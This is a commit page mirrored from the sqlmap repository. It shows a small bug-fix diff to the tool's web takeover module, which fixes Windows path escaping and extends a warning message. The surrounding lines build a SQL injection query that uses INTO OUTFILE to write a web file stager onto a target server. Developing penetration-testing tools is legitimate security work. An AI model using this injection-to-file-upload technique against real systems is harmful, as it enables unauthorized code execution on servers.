sqlmapproject/sqlmap
1
1
Fork 0
mirror of https://github.com/sqlmapproject/sqlmap.git synced 2025-03-03 19:55:47 +03:00
Code Issues Packages Projects Releases Wiki Activity

minor cosmetics and bug fix for Windows machines ('\\' is interpreted as \ and inside the script it can screw things up as it's a marker for a special character - thus '\\\\' is interpreted as \\ which represents special character \)

Browse Source
This commit is contained in:
Miroslav Stampar 2010-11-17 09:33:05 +00:00
parent af92c05930
commit bec152609a
1 changed files with 2 additions and 2 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

4
lib/takeover/web.py
View File

@ -95,7 +95,7 @@ class Web:
def __webFileInject(self, fileContent, fileName, directory): def __webFileInject(self, fileContent, fileName, directory):
outFile = posixpath.normpath("%s/%s" % (directory, fileName)) outFile = posixpath.normpath("%s/%s" % (directory, fileName))
uplQuery = fileContent.replace("WRITABLE_DIR", directory.replace('/', '\\') if kb.os == "Windows" else directory) uplQuery = fileContent.replace("WRITABLE_DIR", directory.replace('/', '\\\\') if kb.os == "Windows" else directory)
query = "LIMIT 1 INTO OUTFILE '%s' " % outFile query = "LIMIT 1 INTO OUTFILE '%s' " % outFile
query += "LINES TERMINATED BY 0x%s --" % hexencode(uplQuery) query += "LINES TERMINATED BY 0x%s --" % hexencode(uplQuery)
query = agent.prefixQuery(query) query = agent.prefixQuery(query)
@ -193,7 +193,7 @@ class Web:
elif "<%" in uplPage or "<?" in uplPage: elif "<%" in uplPage or "<?" in uplPage:
warnMsg = "file stager uploaded " warnMsg = "file stager uploaded "
warnMsg += "on '%s' but not dynamically interpreted" % directory warnMsg += "on '%s' but not dynamically interpreted ('%s')" % (directory, self.webStagerUrl)
logger.warn(warnMsg) logger.warn(warnMsg)
continue continue